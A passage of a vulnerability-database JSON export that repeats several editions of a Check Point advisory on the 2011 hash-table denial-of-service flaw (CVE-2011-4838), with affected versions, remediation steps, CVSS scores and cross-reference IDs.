["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-12T19:11:55", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-12T19:11:55", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-12T19:11:55", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-13T11:11:20", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4838", "CVE-2011-4815", "CVE-2011-3414", "CVE-2011-4885"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:30071", "SSV:72454", "SSV:30001", "SSV:26122", "SSV:26121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:71568", "OPENVAS:70754", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310881226", "OPENVAS:863963", "OPENVAS:881167", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310870638", "OPENVAS:863681", "OPENVAS:1361412562310122001", "OPENVAS:870529", "OPENVAS:136141256231070754", "OPENVAS:1361412562310881119", "OPENVAS:136141256231070735", "OPENVAS:1361412562310122002", "OPENVAS:863921", "OPENVAS:831554", "OPENVAS:1361412562310122012", "OPENVAS:870638", "OPENVAS:1361412562310881167"]}, {"type": "nessus", "idList": ["FEDORA_2012-0504.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0069.NASL", "F5_BIGIP_SOL13588.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "REDHAT-RHSA-2012-0019.NASL", "REDHAT-RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "SOLARIS11_RUBY_20120417.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ALA_ALAS-2012-35.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2012-1262.NASL", "FEDORA_2012-1301.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2011-17542.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:7706F20CE7", "FEDORA:6D8EE20EB6", "FEDORA:7F79620D03", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019", "ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-12T19:11:55", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-12T19:11:55", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-13T11:11:20", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-13T15:09:02", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4885", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4838", "CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4815"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2013-033", "CPAI-2014-1022"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:26121", "SSV:26122", "SSV:30071", "SSV:26126", "SSV:72454"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122002", "OPENVAS:1361412562310122001", "OPENVAS:863921", "OPENVAS:136141256231070735", "OPENVAS:71568", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310870542", "OPENVAS:870638", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310120218", "OPENVAS:863742", "OPENVAS:870542", "OPENVAS:70754", "OPENVAS:1361412562310120256", "OPENVAS:863681", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:831554", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310881167", "OPENVAS:136141256231071568", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310870638"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2012-0070.NASL", "F5_BIGIP_SOL13588.NASL", "GENTOO_GLSA-201207-06.NASL", "DEBIAN_DLA-209.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17542.NASL", "FEDORA_2012-0504.NASL", "SOLARIS11_RUBY_20120417.NASL", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2012-1262.NASL", "ALA_ALAS-2012-35.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "CENTOS_RHSA-2012-0069.NASL", "REDHAT-RHSA-2012-0070.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2012-0420.NASL", "FEDORA_2011-17551.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2012-1301.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0092", "CESA-2012:0070", "CESA-2012:0093"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:6D55C20D95", "FEDORA:76D5120DE0", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-13T15:09:02", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-13T15:09:02", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-13T15:09:02", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-14T07:18:08", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4838", "CVE-2011-3414", "CVE-2011-4885"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:30071", "SSV:26121", "SSV:26126", "SSV:26122", "SSV:30001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310863921", "OPENVAS:1361412562310120256", "OPENVAS:136141256231070735", "OPENVAS:870539", "OPENVAS:1361412562310870638", "OPENVAS:863921", "OPENVAS:71568", "OPENVAS:1361412562310122001", "OPENVAS:863824", "OPENVAS:870638", "OPENVAS:136141256231070754", "OPENVAS:1361412562310863681", "OPENVAS:881167", "OPENVAS:881149", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:831554", "OPENVAS:863706", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310120218", "OPENVAS:863681", "OPENVAS:136141256231071568"]}, {"type": "nessus", "idList": ["FEDORA_2012-1262.NASL", "DEBIAN_DLA-209.NASL", "FEDORA_2011-17542.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0069.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0069.NASL", "FEDORA_2012-0504.NASL", "REDHAT-RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0019.NASL", "REDHAT-RHSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ALA_ALAS-2012-35.NASL", "REDHAT-RHSA-2012-0019.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2011-17551.NASL", "SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2012-0420.NASL", "GENTOO_GLSA-201207-06.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "F5_BIGIP_SOL13588.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:7F79620D03", "FEDORA:6097820D6A", "FEDORA:6D8EE20EB6", "FEDORA:BFF2C21133", "FEDORA:3515C213E6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-14T07:18:08", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-14T07:18:08", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-14T07:18:08", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, 